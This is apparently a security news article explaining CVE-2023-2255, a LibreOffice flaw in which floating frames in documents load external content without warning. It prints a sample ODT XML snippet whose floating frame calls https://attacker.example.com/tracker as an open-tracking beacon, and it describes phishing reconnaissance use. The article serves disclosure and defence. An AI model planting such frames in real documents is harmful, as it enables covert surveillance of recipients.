CVE CyberSecurity Database News

CVE-2023-2255 - Exploiting Floating Frame External Link Loading in LibreOffice

Poster -

LibreOffice is one of the most popular open-source office suites, trusted by individuals, businesses, and government agencies across the globe. But sometimes, even trusted software can contain surprising holes. CVE-2023-2255 is a security vulnerability in LibreOffice that might let an attacker quietly load external content — exposing users to privacy risks or worse.

In this article, we’ll break down what this vulnerability means, show a simple example, discuss abuse possibilities, and provide references and tips for protection.

What is CVE-2023-2255?

This vulnerability is an improper access control issue discovered in the editor components of LibreOffice. In short, if a document included certain embedded content — specifically, a “floating frame” element linking to an external resource, like an image or web page — LibreOffice would load that outside resource without showing a security prompt. Normally, LibreOffice warns before loading external content, but in this case, the user saw nothing.

LibreOffice 7.5 before 7.5.3

Reference:  
- LibreOffice Security Advisory CVE-2023-2255
- NVD Entry

Understanding Floating Frames

In LibreOffice, especially in Writer, you can embed a frame (think of it as a miniature, moveable window within your document). Sometimes, these frames can be told to load content from an external source, using a URI (web or file address).

While other content like images or OLE objects prompt you before loading external data, floating frames did not — enabling a crafty attacker to sneak in outside content, which the software would fetch as soon as you opened or previewed the document.

Sample Malicious Document (XML Snippet)

LibreOffice documents (ODT, ODS, etc.) are zip files containing XML. Here’s a simple XML snippet that demonstrates the exploit. In a real-world attack, the attacker simply sends you a regular ODT file.

<office:document-content>
    ...
    <draw:frame draw:name="MaliciousFrame" svg:width="7cm" svg:height="2cm">
        <draw:floating-frame xlink:href="https://attacker.example.com/tracker"; xlink:type="simple" />
    </draw:frame>
    ...
</office:document-content>

What happens?
When you open this file in an unpatched LibreOffice, it quietly connects to https://attacker.example.com/tracker, loading whatever is there (e.g., a tracking image, malicious script, or file), without asking your permission.

Ability for attacker to track when you open the document (user activity beacon)

Abuse Example:  
A hacker could use floating frame URLs for "phishing recon," finding out which targets open the document, with no warning to the victim.

Open with a vulnerable (unpatched) LibreOffice.

If you have a simple HTTP server running at your own address, you’ll see the connection as soon as the doc is viewed.

Upgrade to at least 7.4.7 or 7.5.3.

- Latest downloads here.

Patched released: April 2023

- Public disclosure: LibreOffice Security Advisory

Conclusion

CVE-2023-2255 was a surprising privacy-bypassing bug affecting millions of LibreOffice users. While the risk may seem small to most, the value for targeted surveillance, red-team operations, or even basic phishing cannot be ignored. Staying up-to-date and cautious with documents — even those you think are safe — is always the best defense.

More Reading

- Original LibreOffice Advisory
- National Vulnerability Database Entry
- LibreOffice Release Notes
- General Security Practices for Documents


*Written exclusively for this post. If you appreciate straightforward security breakdowns, bookmark and share!*

Timeline

Published on: 05/25/2023 20:15:00 UTC
Last modified on: 06/01/2023 17:34:00 UTC